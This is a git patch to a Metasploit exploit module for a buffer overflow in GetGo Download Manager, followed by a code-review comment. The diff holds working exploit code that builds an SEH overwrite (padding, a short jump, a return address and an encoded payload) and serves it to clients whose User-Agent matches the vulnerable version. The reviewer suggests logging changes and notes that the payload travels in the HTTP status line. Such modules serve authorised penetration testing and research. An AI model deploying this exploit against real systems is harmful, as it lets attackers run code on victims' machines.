From ef0be946b1b56c14f51b1a93ad5c22931fc568b5 Mon Sep 17 00:00:00 2001
From: Gabor Seljan
Date: Thu, 15 Jan 2015 10:39:17 +0100
Subject: [PATCH] Use HttpServer instead of TcpServer

---
 .../browser/getgodm_http_response_bof.rb | 27 ++++++++++++-------
 1 file changed, 17 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/windows/browser/getgodm_http_response_bof.rb b/modules/exploits/windows/browser/getgodm_http_response_bof.rb
index 8285ffe68a..fba784441e 100644
--- a/modules/exploits/windows/browser/getgodm_http_response_bof.rb
+++ b/modules/exploits/windows/browser/getgodm_http_response_bof.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
   include Msf::Exploit::Remote::Seh
-  include Msf::Exploit::Remote::TcpServer
+  include Msf::Exploit::Remote::HttpServer
   def initialize(info = {})
     super(update_info(info,
@@ -59,21 +59,28 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget' => 0))
   end
-  def on_client_connect(client)
+  def on_request_uri(cli, request)
-    sploit = "HTTP/1.1 200 "
-    sploit << rand_text_alpha(target['Offset'])
+    print_status("Client connected...")
+
+    unless request['User-Agent'] =~ /GetGo Download Manager 4.0/
+      print_error("Sending 404 for unknown user-agent")
+      send_not_found(cli)
+      return
+    end
+
+    sploit = rand_text_alpha(target['Offset'])
     sploit << "\x90\x90\xEB\x06"
     sploit << [target.ret].pack('V')
     sploit << payload.encoded
-    print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...")
-    client.put(sploit)
+    print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")
-    sleep(3)
-    handler(client)
-    service.close_client(client)
+    resp = create_response(200, sploit)
+    resp.body = ""
+    cli.send_response(resp)
+
+    close_client(cli)
   end
-
 end
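Review bot: In the new `on_request_uri` the log lines no longer identify the peer: `print_status("Client connected...")` fires before the User-Agent check and names no host, the 404 branch logs nothing about who was rejected, and the "Sending … bytes" message dropped the `peerhost` that the removed line printed, so a run that serves several clients cannot be matched to hosts afterwards; `cli` exposes `peerhost` just as `client` did, so `print_status("Client #{cli.peerhost} connected...")` and `print_status("Sending #{sploit.length} bytes to #{cli.peerhost}:#{cli.peerport}...")` restore that. The rejection is an expected path rather than a failure, so `print_error` on the 404 branch reads as a fault in the module; `print_status` (or `print_warning`) with the rejected user-agent value is a better fit. The pair `resp = create_response(200, sploit)` followed by `resp.body = ""` deserves a why-comment, since the second argument of `create_response` is the reason phrase of the status line, not the body, and the next maintainer may assume the assignment discards the payload: `# second arg of create_response is the status reason phrase; body stays empty on purpose`. The method is fully inside the hunk, but the enclosing class starts before it.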